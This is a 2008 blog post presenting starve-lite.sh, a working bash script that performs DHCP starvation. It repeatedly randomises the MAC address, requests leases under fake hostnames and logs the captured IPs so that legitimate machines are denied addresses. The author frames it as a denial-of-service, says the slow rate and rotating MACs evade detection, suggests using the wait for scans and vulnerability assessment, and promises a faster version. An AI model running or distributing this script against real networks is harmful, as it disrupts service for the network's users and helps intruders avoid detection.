I came upon something today that caught my attention; a way to "suck up" all the IP's on a network to essentially create a DOS. This is a DOS because you are denying legitimate computers on the network the ability to communicate with other computers on the network. There was a program that I could download to perform the DOS but I wanted something that I could utilize right away and not need to make sure I am missing dependencies (Note, Linux script running on BackTrack 3).
Its rather simple.
1. Bring down the interface
2. Change the MAC
3. Bring up the interface
4. Send DHCP request w/ fake hostname
5. Calculate how long it took
6. Calculate how many taken per minute & in the next 1/2 & full hour
7. Log what IP's have been taken
If you leave it running it will try and snag an available IP right as it comes available. I have tested it on my network and I was able to get quite a few before I turned it off. Against the speed of my DHCP server the script calculated that a whole "C" block would be taken within an hour. Plenty of time to do scans, vuln assessment, etc. while you wait.
Also, this method should evade detection because IP requests are coming from a different MAC every time. They are also coming at a slower rate (hence, starve-lite.sh). If you have any Cisco gear that you can turn on detection and then run the script, please let me know how it goes. :) I should be releasing a faster-rate version soon that will gobble up as many as possible right away but has more possibility of detection.
starve-lite.sh
#! /bin/bash
ref=`date +%s`
clear
while [ 1 ]
do
int="eth0"
stt=`date +%s`
ifconfig $int down
macchanger -rA $int
ifconfig $int up
rm -f /etc/dhcpc/*.pid
dhcpcd -h `echo "$RANDOM"` $int
ip=`ifconfig $int | grep inet | cut -d":" -f2 | awk '{ print $1 }'`
echo "$ip" >> /starve.txt
ent=`date +%s`
run=`expr $ent - $stt`
min=`expr 60 / $run`
half=`expr 1800 / $run`
hour=`expr 3600 / $run`
clear
echo "Total IP Leases Taken: `wc -l /starve.txt | awk '{ print $1 }'`"
echo "Running Time: $run Seconds"
echo "Approx. $min IP's Per Minute"
echo "Approx. $half IP's Per 1/2 Hour"
echo "Approx. $hour IP's Per Hour"
echo "---------------------------"
done
Wednesday, December 31, 2008
Subscribe to:
Posts (Atom)